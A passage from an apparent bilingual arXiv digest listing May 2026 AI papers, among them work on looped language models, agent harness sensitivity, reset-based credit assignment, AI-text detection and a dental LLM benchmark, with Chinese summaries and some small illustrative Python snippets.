performance, while Variational Autoencoder (VAE)-based and Genetic Algorithm (GA)-based methods exhibit distinct advantages in specific scenarios. By establishing a unified evaluation standard for target-driven materials formulation, MatFormBench enables reproducible benchmarking, principled algorithm comparison, and diagnostic analysis of inverse design strategies, providing a foundational tool for advancing materials inverse design.

2605.26733 2026-05-27 cs.LG cs.AI 版本更新

Stabilizing Recurrent Dynamics for Test-Time Scalable Latent Reasoning in Looped Language Models

循环语言模型中测试时可扩展潜在推理的稳定循环动力学

Xiao-Wen Yang, Ziyu Han, Xi-Hua Zhang, Wen-Da Wei, Jie-Jing Shao, Lan-Zhe Guo, Yu-Feng Li

发表机构 * State Key Laboratory of Novel Software Technology, Nanjing University, Nanjing, China(新型软件技术国家重点实验室,南京大学,南京,中国) School of Artificial Intelligence, Nanjing University, Nanjing, China(人工智能学院,南京大学,南京,中国) School of Intelligence Science and Technology, Nanjing University, Nanjing, China(智能科学与技术学院,南京大学,南京,中国)

AI总结 提出STARS训练框架,通过雅可比谱半径正则化约束潜在状态趋近渐近稳定不动点,解决循环语言模型深度递归时性能崩溃问题,实现可靠的测试时扩展并提升峰值性能。

Comments ICML 2026

详情
AI中文摘要

循环语言模型(LoopLMs)通过深度递归实现高效的潜在推理,但表现出不可靠的测试时缩放行为:性能通常在某个迭代深度达到峰值,然后随着进一步递归而崩溃。通过潜在动力学分析,我们发现现有架构和策略在稳定性和有效性之间存在固有的权衡。通过将推理概念化为不确定性减少,我们提出收敛到稳定不动点同时保持有效性是一种有前景的方法。为此,我们提出了STARS(稳定性驱动的递归缩放),一种训练框架,约束潜在状态趋近渐近稳定不动点。这通过高效的雅可比谱半径正则化和随机循环采样实现,使STARS能够在确保严格稳定性的同时最大化有效性。在算术任务上的实验表明,STARS实现了可靠的测试时缩放,在复杂数学推理中,它显著减轻了随着递归深度增加而出现的性能退化,同时提高了峰值性能。

英文摘要

Looped Language Models (LoopLMs) enable efficient latent reasoning through depth recurrence, yet exhibit unreliable test-time scaling behavior: performance often peaks at a certain iteration depth and then collapses with further recurrence. Through latent dynamics analysis, we find an inherent trade-off between stability and effectiveness in existing architectures and strategies. By conceptualizing reasoning as uncertainty reduction, we propose that converging toward stable fixed points while preserving effectiveness is a promising direction. To this end, we propose STARS (STAbility-driven Recurrent Scaling), a training framework that constrains latent states to approach asymptotically stable fixed points. This is realized via efficient Jacobian Spectral Radius Regularization with random loop sampling, enabling STARS to maximize effectiveness while ensuring rigorous stability. Experiments on arithmetic tasks show that STARS achieves reliable test-time scaling, and on complex mathematical reasoning it substantially mitigates performance degradation as recurrence depth increases while also improving peak performance.
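
The link between a Jacobian's spectral radius and stable fixed points can be illustrated with a small linear example. The sketch below is not the STARS implementation: it assumes a toy looped update h <- A h + b (whose Jacobian is simply A), estimates the spectral radius by power iteration, and uses a hypothetical hinge penalty `radius_penalty` with an arbitrary `target` of 0.9. All names and matrices here are illustrative assumptions.

```python
import math

def matvec(a, x):
    """Multiply square matrix `a` (list of rows) by vector `x`."""
    return [sum(aij * xj for aij, xj in zip(row, x)) for row in a]

def spectral_radius(a, iters=200):
    """Estimate the spectral radius of `a` by power iteration.

    Assumes a single dominant real eigenvalue and a start vector with a
    nonzero component along its eigenvector.
    """
    n = len(a)
    x = [1.0 / math.sqrt(n)] * n  # unit-norm start vector
    radius = 0.0
    for _ in range(iters):
        y = matvec(a, x)
        radius = math.sqrt(sum(v * v for v in y))  # ||A x|| with ||x|| = 1
        if radius == 0.0:
            return 0.0
        x = [v / radius for v in y]
    return radius

def radius_penalty(radius, target=0.9):
    """Hypothetical hinge penalty: zero while the radius stays below `target`."""
    return max(0.0, radius - target) ** 2

def run_loop(a, b, steps):
    """Apply the looped update h <- A h + b for `steps` iterations from h = 0."""
    h = [0.0] * len(b)
    for _ in range(steps):
        h = [v + bi for v, bi in zip(matvec(a, h), b)]
    return h

stable = [[0.5, 0.1], [0.0, 0.3]]    # eigenvalues 0.5 and 0.3
unstable = [[1.2, 0.0], [0.1, 0.4]]  # eigenvalues 1.2 and 0.4

if __name__ == "__main__":
    for name, a in (("stable", stable), ("unstable", unstable)):
        rho = spectral_radius(a)
        print(name, round(rho, 4), radius_penalty(rho), run_loop(a, [1.0, 1.0], 50))
```

With a radius below 1 the loop settles on a fixed point however many extra iterations are run; above 1 the state grows without bound, which is the kind of collapse under deeper recurrence that the abstract describes.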

2605.26731 2026-05-27 cs.AI cs.CL 版本更新

It's Not the Capability: Harness Sensitivity Is Non-Monotone Across LLM Agent Tiers

不是能力问题:LLM 智能体层级间的驾驭敏感性非单调

Yong-eun Cho

发表机构 * KailosLab(凯罗斯实验室)

AI总结 通过 432 次实验,发现 LLM 智能体的驾驭敏感性随模型层级非单调变化,且依赖模型类型(聊天 vs. 推理),推翻了“更高能力模型需要更少结构指导”的假设。

Comments 9 pages, 3 figures

详情
AI中文摘要

LLM 智能体部署中的一个普遍假设是,更结构化的驾驭方式普遍能提高可靠性,并且能力更强的模型需要成比例地减少结构指导——这共同暗示了模型能力层级与最优驾驭复杂度之间存在单调反比关系。我们通过一个受控的 432 次实验来检验这一假设,实验跨越了四个能力层级的六个模型,在 HEAT-24(一个基于 git 工作区验证的 24 任务合成基准)上采用了三种驾驭条件(轻量、平衡、严格)。我们的结果从两个方面反驳了单调反比关系。首先,对于评估的前沿聊天模型(Gemini 2.5 Flash),增加驾驭冗长度使 VTSR 降低 29-38 个百分点——这是一个驾驭复杂度悖论。其次,对于评估的前沿推理模型(Qwen3.5-122B,启用扩展思考),严格驾驭实现了最高的 VTSR(91.7%)和最低的延迟,与预测相反。在受限层级内,一个 2B 模型(Gemma4:e2B)在所有驾驭条件下均以 91.7% 的 VTSR 达到了强开放层级的稳定性。由于本研究中每个层级仅由一个模型代表,这些结果应解释为模型特定的观察;驾驭敏感性在所评估的模型中呈现非单调性,并且关键依赖于模型类型(聊天 vs. 推理)。我们引入了一个六标签失败分类法,显示格式违规主导了能力强的模型失败,而错误文件主导了低能力失败,并推导出了实用的层级感知驾驭选择指南。

英文摘要

A prevalent assumption in LLM agent deployment holds that more structured harnesses universally improve reliability, and that higher-capability models need proportionally less structural guidance -- together implying a monotone inverse relationship between model capability tier and optimal harness complexity. We test this hypothesis through a controlled 432-run experiment crossing six models across four capability tiers with three harness conditions (light, balanced, strict) on HEAT-24, a 24-task synthetic benchmark with git-based workspace verification. Our results refute the monotone inverse relationship on two fronts. First, for the frontier chat model evaluated (Gemini 2.5 Flash), increased harness verbosity lowers VTSR by 29-38 percentage points -- a harness-complexity paradox. Second, for the frontier reasoning model evaluated (Qwen3.5-122B, extended thinking enabled), strict harness achieves the highest VTSR (91.7%) and the lowest latency, the opposite of the prediction. Within the constrained tier, a 2B model (Gemma4:e2B) matches strong-open-tier stability at 91.7% across all harnesses. Because each tier is represented by a single model in this study, these results should be interpreted as model-specific observations; harness sensitivity appears non-monotone across the models evaluated, and depends critically on model type (chat vs. reasoning). We introduce a six-label failure taxonomy showing that format_violation dominates capable-model failures while wrong_file dominates low-capability failures, and we derive practical tier-aware harness selection guidelines.

2605.26726 2026-05-27 eess.IV cs.AI cs.CV 版本更新

Measuring Prediction Uncertainty in Neural Cellular Automata

神经细胞自动机中的预测不确定性测量

Ario Sadafi, Michael Deutges, Nassir Navab, Carsten Marr

发表机构 * Computational Health Center, Helmholtz Munich, Neuherberg, Germany(赫尔姆霍茨慕尼黑计算健康中心) Helmholtz AI, Helmholtz Munich, Neuherberg, Germany(赫尔姆霍茨慕尼黑人工智能研究所) Computer Aided Medical Procedures, Technical University of Munich, Munich, Germany(慕尼黑工业大学计算机辅助医疗程序研究所) Munich Center for Machine Learning, Munich, Germany(慕尼黑机器学习中心) Department of Medicine III, Ludwig-Maximilian-University Hospital, Munich, Germany(慕尼黑路德维希-马克西米利安大学医院第三内科) Department of Physics, University of Munich, Munich, Germany(慕尼黑大学物理系) German Cancer Consortium (DKTK), partner site Munich, Germany(德国癌症联盟(DKTK)慕尼黑合作站点)

AI总结 提出一种基于动态系统收敛性的不确定性度量方法,通过扰动自动机状态并观察预测稳定性来评估神经细胞自动机在医学图像分割中的可信度。

Comments Accepted for publication at the 29th International Conference on Medical Image Computing and Computer Assisted Intervention - MICCAI 2026

详情
AI中文摘要

神经细胞自动机(NCA)为编码器-解码器分割网络提供了一种轻量级替代方案。然而,决定何时应信任预测可能很困难。在这里,我们研究基于NCA的医学图像分割的不确定性估计,无需修改底层架构或重新训练模型。我们的方法通过将NCA视为一个动态系统来激发,其中收敛吸引子对应于可信预测。具体地,我们提出了弹性(resilience),这是一种简单的度量,通过探测在自动机状态微小扰动下最终预测的稳定性来利用NCA固有的迭代结构。返回相同解的预测被认为是可信的,而显著变化的预测被标记为不确定。我们使用选择性预测指标($\Delta$Dice@90和AURC)和排序指标(AUROC和AUPRC)通过其预测分割质量的能力来评估不确定性。在多个医学分割基准测试中,弹性比基线更可靠地识别失败案例,提高了基于NCA模型的信任度和安全性。

英文摘要

Neural cellular automata (NCA) provide a lightweight alternative to encoder-decoder segmentation networks. However, it can be difficult to decide when a prediction should be trusted. Here, we study uncertainty estimation for NCA-based medical image segmentation without modifying the underlying architecture or retraining the model. Our approach is motivated by viewing the NCA as a dynamical system where convergent attractors correspond to confident predictions. Concretely, we propose resilience, a simple measure that leverages the intrinsic iterative structure of NCAs by probing the stability of the final prediction under small perturbations of the automaton state. Predictions that return to the same solution are deemed confident, while those that change substantially are flagged as uncertain. We evaluate uncertainty by its ability to predict segmentation quality using selective prediction metrics ($\Delta$Dice@90 and AURC) and ranking metrics (AUROC and AUPRC). Across multiple medical segmentation benchmarks, resilience identifies failure cases more reliably than baselines, improving trust and safety in NCA-based models.
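
The idea of probing prediction stability under small state perturbations can be sketched on a toy iterative system. The code below is an illustration under strong assumptions, not the paper's measure: `nca_step` is a made-up per-cell update standing in for a trained NCA (cells are not coupled), the perturbation is applied to the state before the rollout, and the noise level, trial count, and input values are arbitrary.

```python
import random

def nca_step(state, gain=0.3):
    """Toy update: push each cell away from 0.5 and clamp to [0, 1].

    Stands in for one step of a trained NCA; cells are not coupled here.
    """
    return [min(1.0, max(0.0, s + gain * (s - 0.5))) for s in state]

def rollout(state, steps=30):
    """Iterate the update and threshold the final state into a binary mask."""
    for _ in range(steps):
        state = nca_step(state)
    return [s > 0.5 for s in state]

def resilience(state, noise=0.05, trials=200, seed=0):
    """Per-cell fraction of perturbed rollouts that reproduce the unperturbed label."""
    rng = random.Random(seed)
    base = rollout(state)
    agree = [0] * len(state)
    for _ in range(trials):
        perturbed = [s + rng.uniform(-noise, noise) for s in state]
        for i, (p, b) in enumerate(zip(rollout(perturbed), base)):
            agree[i] += (p == b)  # True counts as 1
    return [count / trials for count in agree]

if __name__ == "__main__":
    # Two clear-cut cells and one borderline cell (values are made up).
    print(resilience([0.9, 0.1, 0.501]))
```

Cells that start far from the decision boundary return to the same label in every trial, while the borderline cell flips in a large share of trials and would be flagged as uncertain.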

2605.26720 2026-05-27 cs.AI 版本更新

Towards Feedback-to-Plan Decisions for Self-Evolving LLM Agents in CUDA Kernel Generation

面向CUDA内核生成中自进化LLM代理的反馈到计划决策

Yee Hin Chong, Jiaming Wu, Youhui Zhang, Peng Qu

发表机构 * Department of Computer Science and Technology, Tsinghua University, Beijing, China(清华大学计算机科学与技术系) Beijing National Research Center for Information Science and Technology, Beijing, China(北京信息科学国家研究中心)

AI总结 通过轨迹冻结和选择性反馈注入,提出CUDAnalyst框架以归因规划决策对反馈组件的贡献,揭示显式规划仅在反馈对齐时有效,且有效规划源于结构化多反馈交互。

Comments ICML 2026 accpeted, camera-ready in progress

详情
AI中文摘要

大型语言模型(LLMs)作为自进化代理在CUDA内核生成中展现出强大的实证收益,这得益于跨代际的反馈条件规划。然而,规划决策如何归因并组合异构反馈信号仍不透明。标准的端到端消融无法解决这一问题,因为迭代规划放大了早期扰动,并将反馈效应与轨迹依赖漂移混为一谈。我们引入CUDAnalyst,一个统一的分析层,通过轨迹冻结和选择性反馈注入,实现对规划决策到反馈组件的受控、代际级归因。CUDAnalyst支持稳定的代际级评估和原则性的联盟式反馈效应及交互归因。我们的结果表明,显式规划仅在反馈对齐时有益,有效规划源于结构化的多反馈交互,且来自更强推理模型的高级规划可部分迁移至较弱模型。这些趋势在参考骨干网络、代表性工作负载和参考归纳机制中保持一致,表明在所研究的受控轴内,识别出的反馈到规划结构是稳健的。

英文摘要

Large language models (LLMs) have shown strong empirical gains as self-evolving agents for CUDA kernel generation, driven by feedback-conditioned planning across generations. However, how planning decisions attribute and combine heterogeneous feedback signals remains opaque. Standard end-to-end ablations fail to resolve this question, as iterative planning amplifies early perturbations and conflates feedback effects with trajectory-dependent drift. We introduce CUDAnalyst, a unified analysis layer for controlled, generation-level attribution of planning decisions to feedback components via trajectory freezing and selective feedback injection. CUDAnalyst enables stable generation-level evaluation and principled coalitional-style attribution of feedback effects and interactions. Our results show that explicit planning is beneficial only when feedback is aligned, that effective planning emerges from structured multi-feedback interactions, and that high-level plans from stronger reasoning models can partially transfer to weaker ones. These trends hold across reference backbones, representative workloads, and reference induction regimes, indicating that the identified feedback-to-plan structure is robust within the controlled axes studied.

2605.26717 2026-05-27 cs.IR cs.AI 版本更新

L2Rec: Towards Dual-View Understanding of LLMs for Personalized Recommendation

L2Rec:面向个性化推荐的LLM双视图理解

Pingjun Pan, Tingting Zhou, Peiyao Lu, Tingting Fei, Hongxiang Chen, Chuanjiang Luo

发表机构 * Netease Cloud Music(网易云音乐)

AI总结 提出L2Rec方法,通过双视图个性化混合专家机制在参数层面统一行为与语义理解,实现端到端个性化推荐,实验证明优于现有方法。

Comments Accepted at SIGIR 2026

详情
AI中文摘要

将大型语言模型(LLM)适配于个性化推荐需要将其通用能力与用户特定偏好对齐,同时有效利用行为信号和语义信号。现有方法通常在输入层(例如,将行为嵌入注入令牌空间)或输出层(例如,独立编码器的对比对齐)整合这些信号,存在分布差距或缺乏端到端任务监督。在这项工作中,我们引入了L2Rec,它在LLM的参数层面统一了行为和语义理解。我们的关键洞察是,同一组Transformer参数可以作为两个视图的共享媒介:通过双视图个性化混合专家(DPMoE)机制应用视图特定的个性化低秩扰动,L2Rec使得单个LLM主干能够为每个用户产生互补的行为和语义适应,且表示层面的不对齐最小化。一个自适应跨视图融合模块进一步将双视图输出整合为统一的用户偏好。在四个数据集上的实验表明,L2Rec持续优于最先进的基线方法,并且在大型工业平台上的在线A/B测试验证了关键参与指标的显著改进。

英文摘要

Adapting large language models (LLMs) for personalized recommendation requires aligning their general-purpose capabilities with user-specific preferences while effectively leveraging both behavioral and semantic signals. Existing approaches typically integrate these signals at either the input level (e.g., injecting behavioral embeddings into the token space) or the output level (e.g., contrastive alignment of separate encoders), suffering from distribution gaps or lack of end-to-end task supervision. In this work, we introduce L2Rec, which unifies behavioral and semantic understanding at the parameter level of LLMs. Our key insight is that the same set of Transformer parameters can serve as a shared medium for both views: by applying view-specific, personalized low-rank perturbations via a Dual-view Personalized Mixture-of-Experts (DPMoE) mechanism, L2Rec enables a single LLM backbone to produce complementary behavioral and semantic adaptations for each user with minimal representation-level misalignment. An adaptive cross-view fusion module further integrates the dual-view outputs into a unified user preference. Experiments on four datasets show that L2Rec consistently outperforms state-of-the-art baselines, and online A/B testing on a large-scale industrial platform validates significant improvements in key engagement metrics.

2605.25507 2026-05-27 cs.AI 版本更新

Credit Assignment with Resets in Language Model Reasoning

语言模型推理中带有重置的信用分配

Ankur Samanta, Akshayaa Magesh, Ayush Jain, Youliang Yu, Daniel Jiang, Kavosh Asadi, Kaveh Hassani, Paul Sajda, Jalaj Bhandari, Yonathan Efroni

发表机构 * Meta AI Columbia University(哥伦比亚大学) Meta Superintelligence Labs(Meta超智能实验室) Tel Aviv University(特拉维夫大学)

AI总结 提出随机重置策略优化(RRPO)和自重置策略优化(SRPO)两种方法,通过重置到中间状态并重新采样反事实延续来改进语言模型多步推理中的信用分配,SRPO在多个推理基准上优于标准GRPO和RRPO。

详情
AI中文摘要

当代使用可验证奖励方法的强化学习通过对轨迹中的所有令牌统一分配单一结果奖励来对多步推理进行语言模型后训练。这种统一分配忽略了哪些步骤促成了成功或失败。改进信用分配可以通过实现对错误推理步骤的针对性细化来解决这一限制,而不是统一更新整个轨迹。重置是一种简单的机制,通过返回到中间状态并重新采样反事实延续来实现更精确的信用分配,从而将结果差异归因于该点做出的决策。我们提出了两种这样的方法:随机重置策略优化(RRPO),其中重置状态从推理步骤中随机抽取;以及自重置策略优化(SRPO),其中模型自我定位错误轨迹中的错误步骤并在此重置。我们在保守策略迭代(CPI)框架内分析了这些方法。通过针对可改进状态的信用分配预言机扩展CPI,相比于随机重置可证明改进。在多个模型和推理基准上,SRPO通过仅在自我定位的重置处采样多个后缀延续并从其奖励中学习,仅使用模型本身且无需外部监督,始终优于标准GRPO和RRPO。

英文摘要

Contemporary reinforcement learning with verifiable reward methods post-train language models on multi-step reasoning by assigning a single outcome reward uniformly across all tokens in a trajectory. Such uniform assignment ignores which steps contributed to success or failure. Improving credit assignment can address this limitation by enabling targeted refinement of faulty reasoning steps, rather than updating entire trajectories uniformly. Resets are one such simple mechanism, enabling more precise credit assignment by returning to an intermediate state and resampling counterfactual continuations, so that outcome differences can be attributed to decisions made at that point. We propose two such methods: Random-Reset Policy Optimization (RRPO), where reset states are drawn randomly from reasoning steps, and Self-Reset Policy Optimization (SRPO), where the model self-localizes the erroneous step in an incorrect trajectory and resets there. We analyze these methods within the Conservative Policy Iteration (CPI) framework. Extending CPI with a credit-assignment oracle that targets improvable states yields provable improvements over random resets. Across models and reasoning benchmarks, SRPO consistently outperforms standard GRPO and RRPO by sampling multiple suffix continuations at a self-localized reset and learning from their rewards, using only the model itself with no external supervision.
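
Resampling counterfactual continuations from an intermediate state can be sketched with a toy reasoning task. This is not RRPO or SRPO as defined by the authors: it assumes a trajectory is a list of booleans (step correct or not), the outcome reward is 1 only if every step is correct, and the sampling policy gets each step right with a made-up probability `p_correct`. The difference between reset values before and after a step then serves as a rough per-step credit signal.

```python
import random

def reward(steps):
    """Outcome reward: 1.0 only if every reasoning step is correct."""
    return 1.0 if all(steps) else 0.0

def reset_value(prefix, horizon, p_correct, n_samples, rng):
    """Average outcome reward over continuations resampled after `prefix`."""
    total = 0.0
    for _ in range(n_samples):
        suffix = [rng.random() < p_correct for _ in range(horizon - len(prefix))]
        total += reward(prefix + suffix)
    return total / n_samples

def step_advantages(trajectory, p_correct=0.8, n_samples=500, seed=0):
    """Credit for step t = value after taking step t minus value before it."""
    rng = random.Random(seed)
    horizon = len(trajectory)
    values = [
        reset_value(trajectory[:t], horizon, p_correct, n_samples, rng)
        for t in range(horizon + 1)
    ]
    return [values[t + 1] - values[t] for t in range(horizon)]

if __name__ == "__main__":
    # The third step (index 2) is the faulty one in this made-up trajectory.
    advantages = step_advantages([True, True, False, True])
    worst = min(range(len(advantages)), key=lambda t: advantages[t])
    print(advantages, "most harmful step:", worst)
```

A uniform outcome reward would assign the same signal to all four steps, whereas the reset-based estimate concentrates the negative credit on the step where the value of the state drops.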

2605.25281 2026-05-27 cs.CL cs.AI 版本更新

READER: Reasoning-Enhanced AI-Generated Text Detection

READER: 增强推理的AI生成文本检测

Pingfan Su, Kai Ye, Shijin Gong, Erhan Xu, Jin Zhu, Giulia Livieri, Chengchun Shi

发表机构 * School of Mathematics, University of Birmingham(伯明翰大学数学学院)

AI总结 提出READER方法,通过微调1.5B参数的LLM在结构化推理数据集READ上,结合推理与检测,在分布偏移下优于GPT-5.2等大100-1000倍的模型。

详情
AI中文摘要

近年来,大型语言模型(LLMs)的进步使得区分人类撰写的文本与AI生成的内容变得越来越困难。许多现有的检测器训练有监督的神经分类器,这些分类器在分布内表现强劲,但通常不透明,且在分布偏移下性能可能大幅下降。我们提出READER,一种增强推理的AI文本检测器,它输出人类/AI标签以及描述其决策证据的结构化理由。我们方法的一个关键组成部分是READ,一个包含理由和判决的精心策划的监督集。我们在READ上微调一个LLM以构建READER,该检测器在推理时先推理再检测。尽管只有1.5B参数,READER始终优于现有检测器以及提示式的高容量LLM基线(GPT-5.2、Gemini-3-Pro和DeepSeek-V3.2),这些基线的规模大100到1000倍。

英文摘要

Recent advances in large language models (LLMs) have made it increasingly difficult to distinguish human-written text from AI-generated content. Many existing detectors train supervised neural classifiers that achieve strong in-distribution performance but are often opaque and can degrade substantially under distribution shift. We present READER, a reasoning-enhanced AI text detector that outputs both a human/AI label and a structured rationale describing the evidence for its decision. A key component of our approach is READ, a curated supervision set of rationales and verdicts. We fine-tune an LLM on READ to build READER, which reasons before detecting at inference time. Despite having only 1.5B parameters, READER consistently outperforms existing detectors as well as prompted, high-capacity LLM baselines (GPT-5.2, Gemini-3-Pro, and DeepSeek-V3.2), which are 100 to 1000 times larger in scale.

2605.24636 2026-05-27 cs.AI cs.CL 版本更新

GlobalDentBench: A Multinational Benchmark for Evaluating LLM Clinical Reasoning in Dentistry with Expert Calibration

GlobalDentBench:一个用于评估牙科领域大语言模型临床推理能力并包含专家校准的多国基准

Junjie Zhao, Jingyi Liang, Zhenyang Cai, Jiaming Zhang, Zhenwei Wen, Shuzhi Deng, Wenjing Yi, Chunfeng Luo, Hexian Zhang, Junying Chen, Tianrui Liu, Zhuhui Bai, Zixu Zhang, Pradeep Singh, Xiang Liu, Jianquan Li, Nhan L Tran, Falk Schwendicke, Zuolin Jin, Lijian Jin, Liangyi Chen, Wei-fa Yang, Benyou Wang, Junwen Wang, Shan Jiang

发表机构 * Division of Applied Oral Sciences and Community Dental Care, Faculty of Dentistry, The University of Hong Kong(香港大学牙科学院应用口腔科学与社区牙科护理系) School of Data Science, The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳)数据科学学院) School of Artificial Intelligence, The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳)人工智能学院) Department of Periodontology, Shenzhen Stomatology Hospital (Pingshan) of Southern Medical University, Shenzhen, China(南方医科大学深圳口腔医院(坪山)牙周科) Beijing Institute of Collaborative Innovation(北京协同创新研究院) Department of Orthodontics, Shenzhen Stomatology Hospital (Pingshan) of Southern Medical University, Shenzhen, China(南方医科大学深圳口腔医院(坪山)正畸科) Shenzhen Stomatology Hospital (Pingshan) of Southern Medical University, Shenzhen, China(南方医科大学深圳口腔医院(坪山)) College of Future Technology, Peking University(北京大学未来技术学院) Freedom AI New Cornerstone Science Laboratory, National Biomedical Imaging Center, State Key Laboratory of Membrane Biology, Institute of Molecular Medicine, Peking-Tsinghua Center for Life Sciences, College of Future Technology, Peking University, Beijing 100871, China(新基石科学实验室、国家生物医学成像中心、膜生物学国家重点实验室、分子医学研究院、北京大学未来技术学院、生命科学中心,北京大学,北京100871,中国) IDG/McGovern Institute for Brain Research, Peking University, Beijing 100871, China(IDG/McGovern脑科学研究院,北京大学,北京100871,中国) Division of Oral and Maxillofacial Surgery, Faculty of Dentistry, The University of Hong Kong(香港大学牙科学院口腔颌面外科系) Shenzhen Loop Area Institute(深圳河套学院) Department of Cancer Biology, Mayo Clinic Arizona, 5777 E. Mayo Blvd., IERB-3-504A, Phoenix, Arizona, 85054, USA(梅奥诊所亚利桑那分部癌症生物学部门,5777 E. Mayo Blvd., IERB-3-504A, Phoenix, Arizona, 85054, USA) Department of Conservative Dentistry, Periodontology and Digital Dentistry, LMU University Hospital, LMU Munich, Munich, Germany(慕尼黑大学医院保守牙科、牙周病学和数字牙科部门,慕尼黑,德国,慕尼黑大学) Division of Periodontology & Implant Dentistry, Faculty of Dentistry, The University of Hong Kong, Hong Kong, SAR, China(香港大学牙科学院牙周病学与种植牙科系,香港,中国)

AI总结 提出首个跨国牙科基准GlobalDentBench,包含14个专科、88个国家的8978道专家验证题目,评估三种推理层次,揭示当前大语言模型在牙科临床推理中性能随复杂度下降且存在高风险。

详情
AI中文摘要

尽管大语言模型(LLMs)在医学领域具有变革潜力,但其在真实临床场景中的推理鲁棒性和安全性仍未得到充分探索,尤其是在牙科领域。本文提出GlobalDentBench,首个跨国牙科基准,其分类体系涵盖六大洲88个国家和地区的14个牙科专科。该基准包含8978道专家验证题目,分为三种格式(选择题、简答题和基于案例的题目),并评估三个递进推理层次:知识回忆(L1)、常规推理(L2)和个体化推理(L3)。为确保数据质量,自动构建框架由六名资深牙医校准,选择题和简答题的专家一致率达到99.98%,更复杂的基于案例的题目达到96.78%。在GlobalDentBench上对12个前沿LLMs的评估显示,随着推理复杂度增加,性能呈急剧阶梯式下降。具体而言,准确率从选择题的81.34%骤降至简答题的64.53%和基于案例的题目的22.34%,同时从L1的74.01%显著下降至L2的55.64%和L3的35.71%。更关键的是,对真实牙科案例的风险分析表明,LLM生成的临床建议中总体不安全率高达31.01%,其中4.51%存在导致不可逆患者伤害的风险,且风险在正畸等专科中尤为突出。这些发现暴露了当前LLMs在医学推理和安全性方面的根本局限性。因此,GlobalDentBench为可信赖的临床AI评估提供了可扩展的基础,强调了在医疗领域安全部署这些模型之前迫切需要严格验证。

English abstract

While large language models (LLMs) hold transformative potential for medicine, their reasoning robustness and safety in real-world clinical scenarios remain critically underexplored, particularly in dentistry. Here we introduce GlobalDentBench, the first multinational dental benchmark, featuring a taxonomy that encompasses 14 dental specialties across 88 countries and regions spanning six continents. The benchmark comprises 8,978 expert-validated questions across three formats (multiple-choice, short-answer, and case-based questions) and assesses three progressive reasoning levels: knowledge recall (L1), routine reasoning (L2), and individualized reasoning (L3). To ensure data quality, the automated construction framework was calibrated by six senior dentists, achieving expert agreement rates of 99.98% for multiple-choice and short-answer questions and 96.78% for the more complex case-based questions. Evaluation of 12 frontier LLMs on GlobalDentBench revealed a sharp, stepwise performance degradation with increasing reasoning complexity. Specifically, accuracy plummeted from 81.34% on multiple-choice to 64.53% on short-answer and 22.34% on case-based questions, while declining markedly from 74.01% at L1 to 55.64% at L2 and 35.71% at L3. More critically, risk analysis of real-world dental cases demonstrated an alarming overall unsafe rate of 31.01% in LLM-generated clinical recommendations, with 4.51% posing risks of irreversible patient harm and risks particularly pronounced in specialties such as orthodontics. These findings expose fundamental limitations in the medical reasoning and safety of current LLMs. Consequently, GlobalDentBench provides a scalable foundation for trustworthy clinical AI evaluation, underscoring the urgent need for rigorous validation before the safe deployment of these models in healthcare.

2605.24219 2026-05-27 cs.AI Updated version

Beyond Final Answers: Auditing Trajectory-Level Hallucinations in Multi-Agent Industrial Workflows

超越最终答案:多智能体工业工作流中的轨迹级幻觉审计

Harshada Badave, Santosh Borse, Andrea Gomez, Harshitha Narahari, Sara Carter, Vishwa Bhatt, Aishani Rachakonda, Shuxin Lin, Dhaval Patel

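Affiliations: IBM; Columbia University

AI summary: Presents Trajel, a dataset and evaluation framework that audits trajectory-level hallucinations in multi-agent industrial workflows using a five-type hallucination taxonomy. It finds common failure modes that existing benchmarks miss and shows that trajectory-aware detection outperforms standard post-hoc verification.

Details
AI Chinese abstract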

大型语言模型(LLM)越来越多地被部署为自主智能体,能够推理、使用工具并执行多步操作。然而,大多数幻觉基准仍然只评估最终输出,忽略了源自中间思考-行动-观察步骤的失败。我们提出了Trajel,一个用于审计多智能体工业工作流中轨迹级幻觉的数据集和评估框架。Trajel在来自AssetOpsBench的专家注释智能体轨迹上引入了一个五类幻觉分类法(事实性、指代性、逻辑性、程序性和范围性)。我们在子任务、轨迹和长上下文级别对监督检测模型进行了基准测试。我们的结果表明,最常见的失败模式被现有基准忽略,近一半的幻觉轨迹同时涉及多种类型,并且具有高二元准确率的自动检测器仍然错误分类最微妙的类型。轨迹感知检测显著优于标准事后验证,使得基于分类法的评估对于更安全的智能体部署成为必要。

English abstract

Large Language Models (LLMs) are increasingly deployed as autonomous agents that reason, use tools, and act over multiple steps. Yet most hallucination benchmarks still evaluate only the final output, missing failures that originate in intermediate Thought-Action-Observation steps. We present Trajel, a dataset and evaluation framework for auditing trajectory-level hallucinations in multi-agent industrial workflows. Trajel introduces a five-type hallucination taxonomy (factual, referential, logical, procedural, and scope-based) over expert-annotated agent traces from AssetOpsBench. We benchmark supervised detection models at the subtask, trajectory, and long-context levels. Our results show that the most common failure modes are missed by existing benchmarks, that nearly half of hallucinated trajectories involve multiple types at once, and that automated detectors with high binary accuracy still misclassify the subtlest types. Trajectory-aware detection significantly outperforms standard post-hoc verification, making taxonomy-grounded evaluation necessary for safer agentic deployment.

2605.24041 2026-05-27 cs.LG cs.AI Updated version

Iterative Refinement Neural Operators are Learned Fixed-Point Solvers: A Principled Approach to Spectral Bias Mitigation

迭代精化神经算子:一种学习型不动点求解器——频谱偏差缓解的原则性方法

Xiaotian Liu, Shuyuan Shang, Xiaopeng Wang, Pu Ren, Yaoqing Yang

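Affiliations: Dartmouth College; CUHK Shenzhen; Lawrence Berkeley National Lab

AI summary: Proposes the Iterative Refinement Neural Operator (IRNO), which applies a learned refinement module through fixed-point iteration and combines it with a progressive spectral loss to mitigate the spectral bias of neural operators, substantially reducing high-frequency error on physical systems such as turbulent flow and active matter.

Comments 47 pages; accepted to ICML 2026 as a Spotlight

Details
AI Chinese abstract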

神经算子作为科学建模的快速数据驱动替代方法,通常依赖于单一前向推理过程,难以解析高频细节,这一局限性称为频谱偏差。我们引入迭代精化神经算子(IRNO),通过固定点迭代反复应用学习精化模块来增强预训练算子。IRNO将预测分解为粗初始化及随后的残差校正,类似于经典数值求解器。在局部假设下,我们建立了诱导算子的收缩性,确保收敛到唯一不动点。为明确针对高频误差,我们提出渐进频谱损失,在训练过程中自适应地增加对高频分量的惩罚。在物理系统中,IRNO持续降低误差,在湍流中提升高达56.05%。在活性物质中,频谱分析显示,相对于基础算子,归一化误差比在低频降至27.72-36.10%,中频降至5.07-6.68%,高频降至1.48-2.04%,且在训练迭代次数之外保持稳定。代码见 https://github.com/xiaotianliu-dartmouth/Iterative_Refinement_Neural_Operator。

English abstract

